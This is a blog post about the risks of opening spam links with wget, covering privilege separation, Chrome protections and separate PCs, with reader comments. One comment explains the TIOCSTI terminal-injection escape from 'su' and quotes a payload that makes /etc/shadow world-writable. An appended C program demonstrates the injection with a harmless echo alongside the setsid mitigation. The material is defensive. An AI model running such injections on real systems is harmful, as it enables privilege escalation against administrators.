Hostile Web Sites

I was asked whether it would be safe to open a link in a spam message with wget. So here are some thoughts about wget security and web browser security in general.

Wget Overview

Some spam messages are designed to attack the recipient’s computer. They can exploit bugs in the MUA, in applications that may be launched to process attachments (e.g. MS Office), or in a web browser. Wget is a very simple command-line program for downloading web pages; it doesn’t attempt to interpret or display them.

As with any network-facing software there is a possibility of exploitable bugs in wget. It is theoretically possible for an attacker to run a web server that detects the client (wget identifies itself with a “Wget/…” User-Agent header by default) and serves a different attack to each of several HTTP clients, wget included.

In practice wget is a very simple program and simplicity makes security easier. A large portion of the security flaws in web browsers relate to plugins such as Flash, to rendering the page for display on a GUI system, and to JavaScript – features that wget lacks. Its attack surface is not zero, though: it still parses HTTP headers, redirects and URLs, and when run recursively it parses HTML to find links.

The Profit Motive

An attacker who aims to compromise online banking accounts probably isn’t going to bother developing or buying an exploit against wget. The number of potential victims is extremely low, and the potential revenue from improving attacks against mainstream web browsers is going to be a lot larger than that from attacking the small number of people who use wget. In fact the potential revenue increase from targeting the most common Linux web browsers (Iceweasel and Chromium) might still be lower than that from targeting Mac users.

However if the attacker doesn’t have a profit motive then this may not apply. There are people and organisations who have deliberately attacked sysadmins to gain access to servers (here is an article by Bruce Schneier about the attack on Hacking Team [1]). It is plausible that someone who is targeting a sysadmin could discover that they use wget and then launch a targeted attack against them. But such an attack won’t look like regular spam. For more information about targeted attacks, Brian Krebs’ article about CEO scams is worth reading [2].

Privilege Separation

If you run wget in a regular Xterm in the same session you use for reading email etc, then an exploitable bug in wget can be used to access all of your secret data, because the compromised process runs with your privileges. But it is very easy to run wget from another account. Run “ssh otheraccount@localhost” and then run the wget command in that session, so that a compromised wget can’t attack your own account. Don’t use “su – otheraccount” for this: the program run under su still shares your terminal, and it is possible for a compromised program to escape from that and feed commands to the shell you return to.

I think that most Linux distributions have supported “switch user” functionality in the X login system for a number of years. So you should be able to lock your session and then change to a session for another user to run potentially dangerous programs.

It is also possible to use a separate PC for online banking and other high-value operations. A 10 year old PC is more than adequate for such tasks, so you could just use an old PC that has been replaced for regular use. You could boot it from a CD or DVD if you are particularly paranoid about attack, since a read-only boot medium can’t be persistently modified by a compromise.

Browser Features

Google Chrome has a feature (“click to play”) to not run plugins unless specifically permitted. This requires a couple of extra mouse actions when watching a TV program on the Internet, but it prevents random web sites from using Flash and Java, which are two of the most common vectors of attack. Chrome also has a feature (Safe Browsing) to check a web site against a Google blacklist before connecting. When I was running a medium size mail server I often had to determine whether URLs being sent out by customers were legitimate or spam; if a user sent out a URL that was on Google’s blacklist I would lock their account without doing any further checks.

Conclusion

I think that even among Linux users (who tend to be more careful about security than users of other OSs) using a separate PC and booting from a CD/DVD will generally be regarded as too much effort. Running a full-featured web browser like Google Chrome and updating it whenever a new version is released will avoid most problems.

Using wget when you have reason to be concerned is a possibility, but not only is it slightly inconvenient, it also often won’t fetch the content that you want: a plain wget of a URL retrieves only that one document, not the frames, images or scripts it references (HTML frames being a common case).

7 comments to Hostile Web Sites

  • (is it) safe to open a link in a spam message with wget

    It may be just me, but the question seems as “not even wrong”. Curiosity and convenience tend to trump caution most of the time when it comes to people and computers. I’d like to believe that the golden rule that should be answered before doing anything is “what’s a compelling reason?”.

    Kudos for including the old reference to “Ihuntsysadmins” – though it seems rather dated given the current belief amongst intelligence agencies (including our own) that any computer is a potentially useful access vector to information important to National security. I.e. I wouldn’t bet against wget (or curl) being targeted; certainly it’d seem prudent not to use them to access websites you believe to contain malware on the same computer people store everything they hold important (and even when people “believe” there is nothing important on their computer).

    Regarding the important point you made about the use of Live CDs… perhaps that indicates a need for greater development of the Live CD project so that it becomes a much simpler affair to generate a limited version of your main computer as an up-to-date Live CD(?). If it was simpler for people to generate an up-to-date LiveCD that was as similar as possible to their usual desktop, included a password manager, their bookmarks, and Tor – and only took a few minutes to configure and build – perhaps it’d be used more often?

  • Another concern in opening links in spam is the fact that it informs the sender that you actually received and saw their spam. Most links I see these days have a unique ID in them that I’m sure is used to connect the specific link to the recipient. Hence just doing an HTTP request, even with wget, marks your email address as “confirmed” in the spammer’s list.

  • When I was running a medium size mail service where accounts were often hijacked by spammers I don’t recall seeing different URLs used in that way. In most cases the same URL was sent to many people. Admittedly that’s a very small sample of the spam that’s out there.

    For a long time the general advice was to never click on unsubscribe links or reply to spam to avoid confirming an address as being read by a human. I’m not sure that works so well nowadays. The cost of sending spam is so low that there’s no real incentive for them to stop spamming an address that doesn’t seem to respond.

    But you are correct to note that there are other potential problems than just compromising the local PC in accessing such links.

  • Diane Trout

    QubesOS has a nice implementation of another solution between use a different account and use a different machine.

    They have disposable VMs that automatically reset after the process ends.

  • Scott: Sorry for the delay, your message went to the spam folder and I don’t check that very often. I disagree about the question being not even wrong, I think it’s a reasonable question. I agree that any computer can be a potential access vector, but sysadmin PCs would be treated differently by any well organised agency. Targeting a sysadmin has the potential to give greater results but more care would be required as unusual access patterns would tip the victim off.

    Making a LiveCD from a desktop installation is an interesting idea, but if you included bookmarks and passwords then there is potential for information leakage.

    Diane: That sounds a lot like the NSA NetTop project (which has Windows VMs on Linux).

  • Emanuel

    > Don’t run “su – otheraccount” as it is possible for a compromised program to escape from that.

    can you elaborate more about how it’s possible?

  • Emanuel: A hostile program can use the TIOCSTI ioctl to push characters in the keyboard buffer and then exit. For example it could put “chmod 666 /etc/shadow\n” into the keyboard buffer to be executed by the administrator shell if you run su from root.
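The TIOCSTI escape described in the reply above is also the reason the post recommends “ssh otheraccount@localhost” over “su – otheraccount”. The following is an added example, not code from the post or its comments: a small C program that performs the injection against its own terminal, and then repeats it in a child that has called setsid() (so the terminal is no longer its controlling tty), which is the condition the kernel checks before allowing TIOCSTI for callers without CAP_SYS_ADMIN. The payload string, the enum and the function names are this example’s own; the comment’s “chmod 666 /etc/shadow” payload is replaced with a harmless echo.

```c
/*
 * tiocsti_demo.c -- added example, not from the original post or its comments.
 *
 * The danger with "su - otheraccount": a program run as otheraccount keeps the
 * administrator's terminal as its controlling tty, so it can queue bytes with
 * the TIOCSTI ioctl as though they had been typed, then exit. The bytes are
 * read by whatever reads the terminal next, i.e. the administrator's shell.
 *
 * Why ssh (or a setsid wrapper) is safer: the untrusted process then either
 * has no access to the administrator's tty at all, or holds it only as a
 * plain fd that is not its controlling terminal; in that case the kernel
 * refuses TIOCSTI with EPERM unless the caller has CAP_SYS_ADMIN.
 *
 * Build and run as an unprivileged user from an interactive shell:
 *     cc -o tiocsti_demo tiocsti_demo.c && ./tiocsti_demo
 */
#include <errno.h>
#include <stdio.h>
#include <sys/ioctl.h>
#include <sys/wait.h>
#include <unistd.h>

/* Outcome of an injection attempt, so callers can tell the cases apart. */
enum tiocsti_result {
    TIOCSTI_INJECTED,   /* bytes are now in the tty input queue                 */
    TIOCSTI_NOT_A_TTY,  /* fd is a pipe/file/socket: ENOTTY                      */
    TIOCSTI_DENIED,     /* not our controlling tty and no CAP_SYS_ADMIN: EPERM   */
    TIOCSTI_DISABLED,   /* kernel has dev.tty.legacy_tiocsti=0 (Linux >= 6.2): EIO */
    TIOCSTI_OTHER       /* anything else, e.g. EBADF                             */
};

/* Push every byte of s into fd's tty input queue, one TIOCSTI call per byte. */
enum tiocsti_result push_keystrokes(int fd, const char *s)
{
    for (; *s; s++) {
        char c = *s;                      /* TIOCSTI takes a pointer to one byte */
        if (ioctl(fd, TIOCSTI, &c) == 0)
            continue;
        switch (errno) {
        case ENOTTY: return TIOCSTI_NOT_A_TTY;
        case EPERM:  return TIOCSTI_DENIED;
        case EIO:    return TIOCSTI_DISABLED;
        default:     return TIOCSTI_OTHER;
        }
    }
    return TIOCSTI_INJECTED;
}

/* The mitigation side: run the same injection in a child that first calls
 * setsid(). The child is not a process-group leader, so setsid() succeeds
 * and drops the controlling tty; fd stays open but is no longer "ours".
 * Returns the child's result, or TIOCSTI_OTHER if fork/wait failed. */
enum tiocsti_result push_keystrokes_after_setsid(int fd, const char *s)
{
    pid_t pid = fork();
    if (pid < 0)
        return TIOCSTI_OTHER;
    if (pid == 0) {
        if (setsid() == (pid_t)-1)
            _exit(TIOCSTI_OTHER);
        _exit(push_keystrokes(fd, s));
    }
    int status;
    if (waitpid(pid, &status, 0) != pid || !WIFEXITED(status))
        return TIOCSTI_OTHER;
    return (enum tiocsti_result)WEXITSTATUS(status);
}

static const char *describe(enum tiocsti_result r)
{
    switch (r) {
    case TIOCSTI_INJECTED:  return "INJECTED (bytes queued as keyboard input)";
    case TIOCSTI_NOT_A_TTY: return "not a tty (ENOTTY)";
    case TIOCSTI_DENIED:    return "denied: not our controlling tty (EPERM)";
    case TIOCSTI_DISABLED:  return "disabled by kernel (EIO)";
    default:                return "other error";
    }
}

int main(void)
{
    /* Harmless stand-in for the comment's "chmod 666 /etc/shadow\n". */
    const char *payload = "echo injected by tiocsti_demo\n";

    printf("direct TIOCSTI on stdin:         %s\n",
           describe(push_keystrokes(STDIN_FILENO, payload)));
    printf("TIOCSTI on stdin after setsid(): %s\n",
           describe(push_keystrokes_after_setsid(STDIN_FILENO, payload)));
    return 0;   /* the shell now reads and runs the echo line queued above */
}
```

Run from an unprivileged interactive shell, the first line reports INJECTED and the shell executes the echo after the program exits, while the second line reports EPERM: the child no longer owns the terminal, which is exactly the state a process reached through ssh (or a setsid wrapper) is in relative to your terminal. Run as root both lines report INJECTED, because CAP_SYS_ADMIN bypasses the controlling-tty check, so the demonstration has to be done from the low-privilege side, which is where the hostile program would be running anyway. Newer mitigations include util-linux su’s “--pty” option and sudo’s “use_pty” setting, which give the target command its own pseudo-terminal, and the dev.tty.legacy_tiocsti sysctl added in Linux 6.2, which makes TIOCSTI fail with EIO for unprivileged callers.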